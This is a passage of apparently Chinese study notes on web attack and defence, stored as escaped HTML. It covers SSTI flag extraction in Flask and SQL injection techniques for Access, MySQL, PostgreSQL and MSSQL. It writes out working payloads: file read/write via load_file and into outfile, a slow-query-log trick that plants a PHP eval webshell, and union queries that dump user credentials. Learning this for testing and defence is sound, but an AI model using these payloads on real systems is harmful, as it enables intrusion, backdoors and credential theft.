has-text-color\">\u5c1d\u8bd5\u68c0\u6d4bJavaWeb\u7a0b\u5e8f\u4e2d\u7528\u5230\u7684\u7ec4\u4ef6\u3001\u7248\u672c\u53ca\u53ef\u4ee5\u7528\u5230\u7684\u5bf9\u5e94\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e00\u662f\u770b\u9879\u76ee\u4e2d\u5e26\u6709\u7684\u7ec4\u4ef6jar\u5305\u5224\u65ad\u6709\u6ca1\u6709\u5b89\u5168\u98ce\u9669\u7ec4\u4ef6\uff1b\u4e8c\u662f\u770b\u4ee3\u7801\u4e2d\u58f0\u660e\u5305\u542b\u7684\u7ec4\u4ef6\uff0c\u5e76\u5728\u4ee3\u7801\u4e2d\u627e\u5230\u5f15\u7528\u7684\u4f4d\u7f6e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u725b\u903c\u70b9\u7684\u5c31\u81ea\u5df1\u627e\u7ec4\u4ef6\u6e90\u4ee3\u7801\u8fdb\u884c\u5ba1\u8ba1\u627e\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-JavaScript\u5b89\u5168<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u5c0f\u8fea\u7684JS\u8bfe\u89c6\u9891\u51fa\u73b0\u5361\u987f\u6ca1\u6cd5\u5b66\uff0c\u7559\u5230\u65e5\u540e\u53e6\u5916\u5b66\u4e60\u4e86\u518d\u56de\u6765\u8865\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">JS\u5f00\u53d1\u7684WEB\u5e94\u7528\u548cPHP\u3001JAVA\u3001. NET\u7b49\u533a\u522b\u5728\u4e8e\u5373\u4f7f\u6ca1\u6709\u6e90\u4ee3\u7801\u4e5f\u53ef\u4ee5\u901a\u8fc7\u6d4f\u89c8\u5668\u67e5\u770b\u6e90\u4ee3\u7801\u83b7\u53d6\u771f\u5b9e\u4fe1\u606f\u3002\u6240\u4ee5\u5bf9JS\u5f00\u53d1\u5e94\u7528\u7684\u6d4b\u8bd5\u5c5e\u4e8e\u767d\u76d2\u6d4b\u8bd5\uff08\u9ed8\u8ba4\u6709\u6e90\u7801\u53ef\u53c2\u8003\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">JS\u4e2d\u5b58\u5728\u53d8\u91cf\u548c\u51fd\u6570\uff0c\u5f53\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\u53ca\u51fd\u6570\u8c03\u7528\u65f6\u5c31\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u539f\u751fJS\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">JS\u4ee3\u7801\u5ba1\u8ba1\u627e\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">JS\u5f00\u53d1\u6846\u67b6\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u8bc6\u522bJS\u6846\u67b6\u7c7b\u522b\u3001\u7248\u672c\u5e76\u67e5\u627e\u5bf9\u5e94\u5b58\u5728\u7684\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5e38\u89c1\u5b89\u5168\u95ee\u9898<\/h4>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-Python\u5b89\u5168<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">PYC\u6587\u4ef6\u53cd\u7f16\u8bd1<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">.pyc\u6587\u4ef6\u662f.py\u6587\u4ef6\u7f16\u8bd1\u540e\u751f\u6210\u7684\u5b57\u8282\u7801\u6587\u4ef6\uff08byte code\uff09\uff0cpyc\u6587\u4ef6\u7ecf\u8fc7\u89e3\u91ca\u5668\u751f\u6210\u673a\u5668\u7801\u540e\u4ea4\u7ed9\u8ba1\u7b97\u673a\u8fd0\u884c\u3002\u56e0\u6b64pyc\u6587\u4ef6\u662f\u53ef\u4ee5\u8de8\u5e73\u53f0\u90e8\u7f72\u7684\uff0c\u7c7b\u4f3cJava\u7684.class\u6587\u4ef6\uff0c\u4e00\u822cpy\u6587\u4ef6\u6539\u53d8\u540e\u90fd\u4f1a\u91cd\u65b0\u751f\u6210pyc\u6587\u4ef6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5de5\u5177\uff08<a rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\" href=\"https:\/\/github.com\/wibiti\/uncompyle2\" target=\"_blank\">https:\/\/github.com\/wibiti\/uncompyle2<\/a>\uff09\u6216\u5728\u7ebf\u53cd\u7f16\u8bd1\u5e73\u53f0\uff08<a href=\"https:\/\/tool.lu\/pyc\/\">https:\/\/tool.lu\/pyc\/<\/a>\uff09\uff08<a href=\"https:\/\/tools.bugscaner.com\/decompyle\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\">https:\/\/tools.bugscaner.com\/decompyle<\/a>\uff09\u5bf9pyc\u6587\u4ef6\u8fdb\u884c\u53cd\u7f16\u8bd1\u5f97\u5230python\u6e90\u4ee3\u7801\u540e\u8fdb\u884c\u5ba1\u8ba1\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">SSTI\u6a21\u7248\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">SSTI\u7b80\u4ecb\uff1a\u6f0f\u6d1e\u6210\u56e0\u662f\u670d\u52a1\u7aef\u63a5\u6536\u4e86\u7528\u6237\u7684\u6076\u610f\u8f93\u5165\u4ee5\u540e\uff0c\u672a\u7ecf\u4efb\u4f55\u5904\u7406\u5c31\u5c06\u5176\u4f5c\u4e3a<strong>Web\u5e94\u7528\u6a21\u7248\u5185\u5bb9\u7684\u4e00\u90e8\u5206<\/strong>\uff0c\u6a21\u7248\u5f15\u64ce\u5728\u8fdb\u884c\u76ee\u6807\u7f16\u8bd1\u6e32\u67d3\u8fc7\u7a0b\u4e2d\uff0c\u6267\u884c\u4e86\u7528\u6237\u63d2\u5165\u7684\u53ef\u4ee5\u7834\u574f\u6a21\u7248\u7684\u8bed\u53e5\uff0c\u9020\u6210\u654f\u611f\u4fe1\u606f\u6cc4\u9732\u3001\u4ee3\u7801\u6267\u884c\uff0c\u751a\u81f3GetShell\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u68c0\u6d4bSSTI\uff1a\u5224\u65ad\u8f93\u5165\u7684\u6570\u636e\u662f\u5426\u4f1a\u88ab\u6d4f\u89c8\u5668\u5229\u7528\u5f53\u524d\u811a\u672c\u8bed\u8a00\u8c03\u7528\u3001\u89e3\u6790\u548c\u6267\u884c\u3002\u4f8b\u5982Python\u7684{{2*2}}\u82e5\u7ed3\u679c\u4e3a4\u5219\u8bf4\u660e\u8f93\u5165\u4f1a\u88ab\u8c03\u7528\u3001\u89e3\u6790\u548c\u6267\u884c\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6f0f\u6d1e\u5e38\u5b58\u5728\u4e8e\u6a21\u7248\u5f15\u7528\u7684\u5730\u65b9\uff08\u5982404\u9519\u8bef\u9875\u9762\uff09\u3001\u5b58\u5728\u4e8e\u6570\u636e\u63a5\u6536\u5f15\u7528\u7684\u5730\u65b9\uff08\u5982\u6a21\u7248\u89e3\u6790\u83b7\u53d6\u53c2\u6570\u6570\u636e\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">PythonWeb-SSTI\u6a21\u7248\u6ce8\u5165\uff08CTF\u8003\u70b9\uff09<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5178\u578b\u7684\u6a21\u7248\u89e3\u6790\u51fd\u6570\uff1arender_template_string( )\uff0c\u770b\u5230\u5219\u5927\u6982\u7387\u53ef\u4ee5\u5224\u65ad\u6a21\u7248\u6ce8\u5165\u70b9\uff1b\u63a5\u7740\u5224\u65ad\u8fc7\u6ee4\u548c\u7ed5\u8fc7\u65b9\u5f0f\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u8fc7\u6ee4\u62ec\u53f7'(&#8216;\uff0c&#8217;)&#8217;<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u53ef\u4ee5\u8003\u8651\u5229\u7528url__for\u8fd9\u79cd\u65e0\u9700\u62ec\u53f7\u5305\u88f9\u53d8\u91cf\u7684\u51fd\u6570\uff0c\u6784\u9020\u8bed\u53e5\u8868\u793a\u5305\u542bflag\u7684\u6587\u4ef6\u7684\u8def\u5f84\uff1a{{url_for.__globals__[&#8216;current_app&#8217;].config}}\u6216\u8005\u66f4\u8be6\u7ec6\u7684\uff1a{{url_for.__globals__[&#8216;current_app&#8217;].config[&#8216;FLAG&#8217;]}}\u3002\u6b64\u5904\u7684<strong>current_app<\/strong>\u8868\u793a<strong>\u5f53\u524dweb\u5e94\u7528<\/strong>\uff0c<strong>config\u6587\u4ef6<\/strong>\u662f\u6839\u636e\u9898\u76ee\u4fe1\u606f\u5f97\u5230\u7684<strong>flag\u5b58\u653e\u5904<\/strong>\u3002\u4e5f\u53ef\u4ee5{{url_for.__globals__}}\u6162\u6162\u627e\uff08\u6570\u636e\u91cf\u5c11\u7684\u8bdd\uff09\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u9ed1\u76d2\u6d4b\u8bd5\u4e2d\u5f88\u96be\u627e\u5230SSTI\u6ce8\u5165\u70b9\uff0c\u56e0\u6b64\u5728CTF\u4e2d\u591a\u89c1\u4e8e\u4ee3\u7801\u5ba1\u8ba1\u9898\u3002\u73b0\u5b9e\u6d4b\u8bd5\u4e2d\u591a\u4e3a\u9ed1\u76d2\u6d4b\u8bd5\u73af\u5883\uff0c\u96be\u4ee5\u53d1\u73b0\u5e76\u5229\u7528\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e5d\u5929\uff1aWEB\u653b\u9632-\u901a\u7528\u6f0f\u6d1e-SQL\u6ce8\u5165<\/h2>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>SQL\u6ce8\u5165\u6f0f\u6d1e<\/strong>\u662f\u670d\u52a1\u5668\u5728\u5904\u7406SQL\u8bed\u53e5\u65f6<strong>\u9519\u8bef\u5730\u62fc\u63a5\u7528\u6237\u63d0\u4ea4\u7684\u53c2\u6570<\/strong>\uff0c\u7834\u574f\u4e86\u539f\u6709\u7684SQL<strong>\u6267\u884c\u903b\u8f91<\/strong>\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u90e8\u5206\u6216\u5b8c\u5168\u638c\u63a7SQL\u8bed\u53e5\u6267\u884c\u6548\u679c\u7684\u5b89\u5168\u95ee\u9898\u3002\u653b\u51fb\u8005\u5728\u539f\u6709\u7684\u6570\u636e\u5e93\u6267\u884c\u8bed\u53e5\u4e2d\uff0c\u901a\u8fc7<strong>\u5f15\u5165\u95ed\u5408\u7b26\u53f7<\/strong>\u4fdd\u8bc1\u539f\u6709\u8bed\u6cd5\u6b63\u786e\uff0c\u5e76<strong>\u5f15\u5165\u5e26\u6709\u65b0\u903b\u8f91\u7684\u67e5\u8be2\u8bed\u53e5<\/strong>\u52a0\u4ee5\u6267\u884c\uff0c\u4ece\u800c\u5b9e\u73b0\u989d\u5916\u7684\u67e5\u8be2\u6548\u679c\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6f0f\u6d1e\u5229\u7528\u9996\u8981\u6761\u4ef6\uff1a\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\u4e14\u4f1a\u88ab\u89e3\u6790\u3001\u6267\u884c\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">SQL\u6ce8\u5165\u7684\u8bed\u53e5\u4ee5\u53ca\u7c7b\u522b\uff0c\u5efa\u8bae\u5728\u5b9e\u6218\u4e2d\u7ec3\u4e60\u8bb0\u5fc6\uff0c\u56e0\u4e3aSQL\u6ce8\u5165\u8bed\u53e5\u6839\u636e\u4e0d\u540c\u6570\u636e\u5e93\u3001\u8bed\u8a00\u90fd\u4f1a\u4ea7\u751f\u4e0d\u540c\uff0c\u6b7b\u8bb0\u786c\u80cc\u662f\u6ca1\u7528\u7684\uff0c\u5173\u952e\u662f\u7406\u89e3\u6570\u636e\u5e93\u64cd\u4f5c\u8bed\u53e5\u7684\u539f\u7406\uff08\u5efa\u8bae\u662f\u597d\u597d\u5b66\u5b8c\u6570\u636e\u5e93\u8fd9\u95e8\u8bfe\uff09\uff0c\u56e0\u6b64\u8fd9\u6b21\u5b66\u4e60\u7b14\u8bb0\u4e0d\u505a\u8fc7\u591a\u7684\u8be6\u7ec6\u8bed\u53e5\u7684\u8bb0\u5f55\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5b66\u624b\u5de5\u6ce8\u5165\u7684\u540c\u65f6\u4e5f\u8981\u719f\u6089\u81ea\u52a8\u5316\u811a\u672c\u5de5\u5177SqlMap\u7684\u4f7f\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-Access\u6570\u636e\u5e93<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Access\u6570\u636e\u5e93\u662f<strong>\u72ec\u7acb<\/strong>\u5b58\u5728\u7684\uff0c\u7ed3\u6784\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6570\u636e\u5e93<br>    \u8868\u540d<br>        \u5217\u540d<br>            \u6570\u636e<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">ASP+Access\uff1a\u7531\u4e8eAccess\u6570\u636e\u5e93\u7279\u6027\uff08\u65e0\u9ad8\u6743\u9650\u6ce8\u5165\u70b9\uff0c\u65e0information_schema\uff0c\u53ea\u80fd\u66b4\u529b\u731c\u89e3\uff09\u5bfc\u81f4\u9488\u5bf9Access\u6570\u636e\u5e93\u7684SQL\u6ce8\u5165\u9700\u8981\u501f\u52a9\u5b57\u5178\u53bb\u731c\u89e3\u8868\u540d\u3001\u5217\u540d\uff0c\u82e5\u51fa\u73b0\u731c\u89e3\u4e0d\u5230\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49\u793e\u5de5\u5b57\u5178\u6216\u91c7\u7528\u504f\u79fb\u6ce8\u5165\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u504f\u79fb\u6ce8\u5165\uff08\u62a5\u9519\u663e\u793a\uff09\u662f\u7528\u4e8e\u89e3\u51b3\u8868\u540d\u5df2\u77e5\u800c\u5217\u540d\u672a\u77e5\u7684\u60c5\u51b5\u3002\u5177\u4f53\u505a\u6cd5\uff1a\u901a\u8fc7\u8054\u5408\u6ce8\u5165&#8221;union select 1,2,&#8230;,n,* from [\u8868\u540d]&#8221;\u6d4b\u51fa\u5217\u6570\uff0c\u7136\u540e\u5728\u7f51\u4e0a\u641cAccess\u504f\u79fb\u6ce8\u5165\u7684n\u7ea7\u504f\u79fb\u8bed\u53e5\u8fdb\u884c\u5957\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-Mysql\u6570\u636e\u5e93<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Mysql\u6570\u636e\u5e93\u662f<strong>\u7edf\u4e00<\/strong>\u7ba1\u7406\u7684\uff0c\u7ed3\u6784\u5982\u4e0b\uff1a\uff08\u53ef\u4ee5\u5b58\u5728<strong>\u591a\u4e2a\u6570\u636e\u5e93<\/strong>\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6570\u636e\u5e93A\uff08\u7f51\u7ad9A\uff09<br>    \u8868\u540d<br>        \u5217\u540d<br>            \u6570\u636e<br>\u6570\u636e\u5e93B\uff08\u7f51\u7ad9B\uff09<br>\u6570\u636e\u5e93C\uff08\u7f51\u7ad9C\uff09<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e3a\u4e86\u7f51\u7ad9\u548c\u6570\u636e\u5e93\u7684\u5b89\u5168\u6027\uff0cMysql\u7684\u7528\u6237\u6709\u5206\u7b49\u7ea7\uff08\u5185\u7f6e\u6709root\u6700\u9ad8\u7528\u6237\uff09\uff0c\u5212\u5206\u7b49\u7ea7\uff0c\u6bcf\u4e2a\u7528\u6237\u5bf9\u5e94\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u4fdd\u8bc1\u6570\u636e\u5e93\u4e4b\u95f4\u4e0d\u5173\u8054\uff0c\u4ece\u800c\u4e0d\u5f71\u54cd\u5176\u5b83\u6570\u636e\u5e93\u8fd0\u884c\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Mysql\u6ce8\u5165\u653b\u51fb\u524d\u7684\u51c6\u5907<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Mysql\u6ce8\u5165\u653b\u51fb\u4e24\u4e2a\u601d\u8def\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u975eROOT\u7528\u6237\u7684\u6ce8\u5165\u653b\u51fb\uff1a\u5e38\u89c4\u7c7b\u731c\u89e3<\/li>\n\n\n\n<li>ROOT\u7528\u6237\u7684\u6ce8\u5165\u653b\u51fb\uff1a\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\uff0c\u8de8\u5e93\u67e5\u8be2\u6ce8\u5165<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u9ed1\u76d2\u6d4b\u8bd5\u4e2d\u53ef\u5c1d\u8bd5\u7528user( )\u67e5\u770b\u5f53\u524d\u7528\u6237\u6743\u9650\uff0c\u767d\u76d2\u6d4b\u8bd5\u4e2d\u53ef\u5728\u6e90\u7801\u4e2d\u770b\u8fde\u63a5\u7684\u7528\u6237\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Mysql5.0\u4ee5\u4e0a\u7248\u672c\u81ea\u5e26\u6570\u636e\u5e93\u540dinformation_schema\uff0c\u5176\u4e2d\u5b58\u50a8\u4e86\u6570\u636e\u5e93\u4e0b\u7684\u6570\u636e\u5e93\u540d\u53ca\u5176\u8868\u540d\u3001\u5217\u540d\u4fe1\u606f\uff0c\u901a\u8fc7\u5148\u6ce8\u5165\u67e5\u8be2information_schema\u4e2d\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u6bd4\u901a\u8fc7\u66b4\u529b\u67e5\u8be2\u66f4\u5feb\u5f97\u5230\u76ee\u6807\u6570\u636e\u5e93\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>information_schema\uff1a\u5b58\u50a8\u6570\u636e\u5e93\u4e0b\u7684\u8868\u540d\u3001\u5217\u540d\u4fe1\u606f<\/li>\n\n\n\n<li>information_schema\uff1a\u8bb0\u5f55\u8868\u540d\u4fe1\u606f\u7684\u8868<\/li>\n\n\n\n<li>information_schema\uff1a\u8bb0\u5f55\u5217\u540d\u4fe1\u606f\u7684\u8868<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u56e0\u6b64\u5173\u4e8eMysql\u6ce8\u5165\u524d\u8981\u5224\u65ad\u7684\u4fe1\u606f\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u67e5\u8be2\u6570\u636e\u5e93\u7248\u672c-\u68c0\u67e5\u662f\u5426\u7b26\u5408information_schema\u7684\u67e5\u8be2-version( )<\/li>\n\n\n\n<li>\u67e5\u8be2\u6570\u636e\u5e93\u7528\u6237-\u67e5\u8be2\u662f\u5426\u7b26\u5408ROOT\u578b\u6ce8\u5165-user( )<\/li>\n\n\n\n<li>\u67e5\u8be2\u5f53\u524d\u64cd\u4f5c\u7cfb\u7edf-\u770b\u662f\u5426\u652f\u6301\u5927\u5c0f\u5199\u6216\u6587\u4ef6\u8def\u5f84\u9009\u62e9-@@version_compile_os<\/li>\n\n\n\n<li>\u67e5\u8be2\u6570\u636e\u5e93\u540d-\u4e3a\u540e\u671f\u731c\u89e3\u6570\u636e\u5e93\u4e0b\u7684\u8868\u3001\u5217\u505a\u51c6\u5907-database( )<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\">MYSQL-ROOT\u9ad8\u6743\u9650\u8bfb\u5199\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7\u9ad8\u6743\u9650\u6ce8\u5165\u70b9\u4e0d\u53ea\u662f\u53ef\u4ee5\u62ff\u5230\u6570\u636e\u5e93\u6570\u636e\uff0c\u6709\u53ef\u80fd\u53ef\u4ee5\u5347\u7ea7\u5bf9\u6587\u4ef6\u7684\u8bfb\u5199\u64cd\u4f5c\uff08\u5199\u4e00\u53e5\u8bdd\u6728\u9a6c\u8fdb\u6587\u4ef6\u4ece\u800c\u5f97\u5230WebShell\uff09\u751a\u81f3\u5b9e\u73b0\u547d\u4ee4\u6267\u884c-\u53cd\u5f39shell\u4ece\u800c\u83b7\u53d6WebShell\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#\u9ad8\u6743\u9650\u8bfb\u5199\u6ce8\u5165\u793a\u4f8b<br>\u8bfb\u53d6\u6587\u4ef6\uff1aunion select 1,load_file('d:\/w.txt'),3,4<br>\u5199\u5165\u6587\u4ef6\uff1aunion select 1,'xxxx'3,4 into outfile 'd:\/w.txt'<br>\u8def\u5f84\u83b7\u53d6\uff1aphpinfo\uff0c\u62a5\u9519\uff0c\u5b57\u5178\u7b49<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5728Mysql\u4e2d\u6709\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6<strong>my.ini<\/strong>\uff0c\u5176\u4e2d\u82e5\u8bbe\u7f6e\u4e86\u914d\u7f6e\u9879<strong>secure-file-priv<\/strong>\u5c06\u4f1a\u9650\u5236\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\u3002\u4f8b\u5982secure-file-priv=c:\/\uff0c\u5219\u65e0\u6cd5\u5bf9D\u76d8\u8fdb\u884c\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\uff0c\u53ea\u80fd\u5728C\u76d8\u8fdb\u884c\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\uff1b\u82e5secure-file-priv=NULL\uff0c\u5219\u4e0d\u5141\u8bb8\u8bfb\u5199\uff1b\u82e5secure-file-priv\u6ca1\u6709\u8bbe\u7f6e\u5177\u4f53\u503c\uff0c\u5219\u4e0d\u505a\u9650\u5236\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5728Mysql5.6.34\u7248\u672c\u4ee5\u540e\uff0csecure-file-priv\u7684\u503c\u9ed8\u8ba4\u4e3aNULL\uff0c\u5e76\u4e14\u65e0\u6cd5\u7528sql\u8bed\u53e5\u8fdb\u884c\u4fee\u6539\u3002\u53ea\u80fd\u901a\u8fc7\u4ee5\u4e0b\u65b9\u5f0f\u4fee\u6539\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Windows\uff1a\u4fee\u6539mysql.ini\u6587\u4ef6\uff0c\u5728[mysqld]\u4e0b\u6dfb\u52a0\u6761\u76eesecure_file_priv=\uff0c\u4fdd\u5b58\u5e76\u91cd\u542fmysql<\/li>\n\n\n\n<li>Linux\uff1a\u5728\/etc\/my.cnf\u7684[mysqld]\u4e0b\u6dfb\u52a0local-infile=0<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u9664\u6b64\u4e4b\u5916\uff0c\u4f9d\u65e7\u5b58\u5728secure-file-priv\u7684\u7a81\u7834\u65b9\u5f0f\uff1a\u65e5\u5fd7\u8bb0\u5f55\u3002\uff08\u6ce8\u610f\uff1a\u8fd9\u4e2a\u65b9\u6cd5\u9700\u8981\u652f\u6301SQL\u6267\u884c\u73af\u5883\uff0c\u82e5\u6ca1\u6709\u5219\u9700\u8981\u501f\u52a9phpmyadmin-\u82e5\u5b58\u5728-\u6216\u5176\u5b83\u80fd\u591f\u76f4\u63a5\u8fde\u4e0a\u6570\u636e\u5e93\u7684\u65b9\u5f0f\u8fdb\u884c\u7ed5\u8fc7\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u5728sql\u67e5\u8be2\u4e2d\u5c1d\u8bd5\u62fc\u63a5\u4ee5\u4e0b\u8bed\u53e5\nset global slow_query_log=1;\/\/\u5f00\u542f\u65e5\u5fd7\u8bb0\u5f55\nset global slow_query_log_file='&#91;shell\u8def\u5f84]';\/\/\u8bbe\u7f6e\u65e5\u5fd7\u8bb0\u5f55\u6587\u4ef6\u7684\u8def\u5f84\nselect '&lt;?php eval($_GET&#91;'shell'])?&gt;' or SLEEP(10);\n\/\/\u901a\u8fc7\u65e5\u5fd7\u8bb0\u5f55\u8ba9\u76ee\u6807\u628a\u6211\u4eec\u7684\u6728\u9a6c\u81ea\u52a8\u5199\u5165\u5230\u524d\u9762\u8bbe\u7f6e\u7684\u65e5\u5fd7\u8bb0\u5f55\u6587\u4ef6\uff0c\u4ece\u800c\u628a\u65e5\u5fd7\u6587\u4ef6\u5f53\u4f5c\u6211\u4eec\u7684WebShell\u540e\u95e8<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-PostgreSQL\u6570\u636e\u5e93<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5148\u7528order by\u8bed\u53e5\u6d4b\u5217\u6570\uff0c\u7136\u540e\u7528&#8217;null&#8217;\u6765\u6d4b\u663e\u4f4d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/\u793a\u4f8b<br>\/\/\u7528\"and 1=2\"\u4ea7\u751f\u62a5\u9519\uff0c\u7ed9null\u52a0\u5f15\u53f7\u6d4b\u8bd5\u663e\u4f4d <br>?id=1 and 1=2 union select 'null',null,null,null \/\/\u9519\u8bef<br>?id=1 and 1=2 union select null,'null',null,null \/\/\u6b63\u5e38<br>?id=1 and 1=2 union select null,null,'null',null \/\/\u6b63\u5e38<br>?id=1 and 1=2 union select null,null,null,'null' \/\/\u9519\u8bef<br>\/\/\u8bf4\u660e\u663e\u4f4d\u57282\u30013<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5c1d\u8bd5\u83b7\u53d6\u4fe1\u606f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/\u793a\u4f8b<br>?id=1 and 1=2 union select null,version(),null,null \/\/\u67e5\u7248\u672c<br>?id=1 and 1=2 union select null,current_user,null,null \/\/\u67e5\u7528\u6237<br>?id=1 and 1=2 union select null,current_database(),null,null \/\/\u67e5\u5f53\u524d\u6570\u636e\u5e93\u540d<br><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u6570\u636e\u5e93\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union select null,string_agg(datname,','),null,null from pg_database<br><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union select null,string_agg(tablename,','),null,null from pg_database where schemaname='public'<br>?id=1 and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u5217\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u6570\u636e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union all select null,username,password,null from manage<br><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u8865\u5145-\u67e5\u8be2DBA\u7528\u6237\uff08\u5728DBA\u7528\u6237\u4e0b\u53ef\u4ee5\u8fdb\u884c\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union select null,string_agg(usename,','),null,null from pg_user where usesuper is true<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-MSSQL\u6570\u636e\u5e93<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">sqlserver\u662f\u5fae\u8f6f\u5f00\u53d1\uff0c\u6240\u4ee5\u770b\u5230ASP.NET\u5c31\u53ef\u4ee5\u8054\u60f3\u5230\u53ef\u80fd\u662f\u7528sqlserver\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5148order by\u6d4b\u5217\u6570\uff0c\u7136\u540e\u6d4b\u663e\u4f4d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">?id=1 and 1=2 union select null,1,null,null<br>?id=1 and 1=2 union select null,null,'s',null<\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">@@version \u83b7\u53d6\u7248\u672c\u4fe1\u606f\uff0cdb_name( ) \u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d\uff0cuser\/system_user\/current_user\/user_name 